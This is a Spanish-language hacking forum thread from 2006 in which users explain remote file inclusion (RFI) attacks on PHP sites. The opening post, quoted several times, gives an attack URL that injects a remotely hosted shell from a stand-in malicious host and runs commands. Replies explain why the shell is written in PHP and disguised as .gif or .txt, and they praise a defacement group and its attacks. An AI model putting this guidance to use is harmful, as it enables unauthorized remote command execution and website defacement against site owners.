Como encontrar RFI

Started by freak, October 26, 2006, 11:23:18 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

freak

RFI= Remote File Inclusion

Se debe a problemas de interpretacion de los programadores.
muchas veces a los programadores se les pasa por alto
y dejan filtrar las variables

ejemplo? dale ke va..

$soyvulnerable_path "/public_html/archivo.php".

:S ke es esooooooo?

$soyvulnerable_path es lo ke se aplica despues de .php?
osea que ahi esta la vulnerabilidad ...kapishe??

veamos el caso "De suposicion" ["public_html/archivo.php"]

Ahy se ve que .php esta haciendo peticiones remota.Este puede ser un rfi seguro ^^
aunke hay ke tener cuidado con los tags de indentificacion ke nos joden la entrada :/

Search.php?soyvulnerable_path=http://www.sitiomalintencionado.com/shell.txt?cmd=ls

tenemos que probar variable por variable :S

es todo espero que se entienda.

autor: FR34K Texto exclusivo de www.hackpr.net/foro




Zixulander

bueno estaba entendiendo hasta ..q..
QuoteSearch.php?soyvulnerable_path=http://www.sitiomalintencionado.com/shell.txt?cmd=ls

tenemos que probar variable por variable :S

es todo espero que se entienda.

autor: FR34K Texto exclusivo de www.hackpr.net/foro

kazin

A lo que se refiere es que una ves que encuentras la pagina vulnerable podras ejecutar tu shell

Search.php?soyvulnerable_path=

Es la web vulnerable

http://www.sitiomalintencionado.com/shell.txt?

Se le agrega la ubicacion de nuestra shell

cmd=ls Ahi simplemente esta ejecutando un comando.

Esperoq ue hallas entendido :).

Saludos

freak

lo del cmd es para ke te de consola y lo de ls .. es listar archivos  .. son comandos unix.. pero las shells de hoy en dia con un simple click dte hacen todo

cMr_Newbie

 ??? mmm, no entendí yo tampoco muy bien bro, dejamela ir mas claro  :D , ya que no entendí mucho, lo que si sabía lo del comando ls que es para Unix  :D .

Hanowar

Men el RFI se da por que la variable (soyvulnerable_path=)

busca un Host remoto...y el codigo no EXPECIFICA una variable...para el ARCHIVO...

eso da a enterder "Pide una ejecucion remota de un archivo".

Nosotros aprovechamos eso

y se llama

Remote File Inclussion.

salu2 y besos

Latin American Defacers

KM

El SQL me tiene loco, aver si refresco la area de mi mente que esta llena de Polvo.

www.webvulnerable.com/Search.php?soyvulnerable_path=http://www.sitiomalintencionado.com/shell.txt?cmd=ls

Rojo- la pagina que esta en el servidor vulneravle?

Azul- La direccion donde esta mi codigo[ Este codigo deve ser diferente para cada vulneravilidad o funciona con todas las webs vulnerables a RFI]?

Orange- Comandos/

Pq hay es donde a mi seme jode el chip, al no saber que codigo devo subir, hay unos que son .gif, otros .txt, y asi, eso me confunde.

Y nada creo que el RFI es una de las vulneravilidades mas comunes no?

freak

Quote from: Hanowar on December 31, 2006, 12:30:20 AM
Men el RFI se da por que la variable (soyvulnerable_path=)

busca un Host remoto...y el codigo no EXPECIFICA una variable...para el ARCHIVO...

eso da a enterder "Pide una ejecucion remota de un archivo".

Nosotros aprovechamos eso

y se llama

Remote File Inclussion.

salu2 y besos

Latin American Defacers
hanowar es la ley men ^^..... si alguien que sepa de defacing .. es el como andas men? .. que bueno tenerte por estos lados  :D :D :D

Hanowar

me arrastraron para aca...

Con respecto al Tio KM


.gif .txt .dot o .jpg

Cual sea...

¿Por que no, .php?.

Por que lo que estaras haciendo es ejecutar shell en el servidor tuyo, no en el de la victima...

¿Que por que tiene que ser la shell en php?.

Por qu tiene atribuciones [cmd] $system!.

Variables que se autodenominan (Como ejecucion de Comandos En Consola).

salu2

LATIN AMERICAN DEFACERS  ;)

cMr_Newbie

Orale Hanowar, pues no ando con muchas ganas ahorita pero le voy a poner atención ya que ando medio dormidón ahorita  :D , pero gracias por tu ayuda... ;) ... me gustaría tenerte a mi lado para que me orientes, ya que ando metiéndome en esto de los defaces y me ha estado gustando mucho y veo que sabes man...

SnO.opy

jeje el rfi si .. posteare un video de un ruso u aleman no c... sube a el server que ataca u shell con terminacion .gif .. pues si aveces confunde pero pues bueno..

Men Hanowars O.o

SOlo que en Wikipedia dice algo, absurdo alguien lo cambio, decia otra cosa pero quiero que vean que pusieron hay http://es.wikipedia.org/wiki/Defacer

Salu2

cMr_Newbie

 :-[ uuhhh, eso si brother Hanowar checkate bro, yo ayer lo hoy lo ví como a las 3 de la mañana y no estaba, o sea que eso es reciente, y la verdad nosé, pero si se pasaron con las cosas que les pusieron a su grupo   :-X , hay gente envidiosa, hecha tierra, egoista y de ese tipo por todos lados bro, así que no te puedes evitar que te hagan algo así..,, pero si ignorarlos y seguir avanzando  ;) ... cambialo bro, eso se ve muy feoo..

KM

Estos muchachos no creo, o mejor estoy seguro que no son tal cosa, ellos dieron con la vul de  YACS CMS <= 6.6.1 context[path_to_root] Remote File Include Vuln y no he buscado mas nada pero estoy seguro que an echo mucho mas.

Y en mi opinion creo que ellos estan en una etapa que apenas comiensan y por lo pronto creo que es normal ese tipo de atakes contra team que comiensan, esto con la intencion de que no sigan creciendo/

Pregunta que me ago, esta gente abran alguna vez dado algun palo a es.wikipedia.org   y si no es asi creo que le sobran escusas para hackearlos.

the_hacker_666

Quote from: FR34K on October 26, 2006, 11:23:18 PM
RFI= Remote File Inclusion

Se debe a problemas de interpretacion de los programadores.
muchas veces a los programadores se les pasa por alto
y dejan filtrar las variables

ejemplo? dale ke va..

$soyvulnerable_path "/public_html/archivo.php".

:S ke es esooooooo?

$soyvulnerable_path es lo ke se aplica despues de .php?
osea que ahi esta la vulnerabilidad ...kapishe??

veamos el caso "De suposicion" ["public_html/archivo.php"]

Ahy se ve que .php esta haciendo peticiones remota.Este puede ser un rfi seguro ^^
aunke hay ke tener cuidado con los tags de indentificacion ke nos joden la entrada :/

Search.php?soyvulnerable_path=http://www.sitiomalintencionado.com/shell.txt?cmd=ls

tenemos que probar variable por variable :S

es todo espero que se entienda.

autor: FR34K Texto exclusivo de www.hackpr.net/foro





Bien dicho...

Con respecto a lo de LAD... sin comentarios man, a veces wikipedia se pasa de ign0rante.

Me honra tenerte en hackpr Hanowar, tenia tiempo sin leerte por ahi :D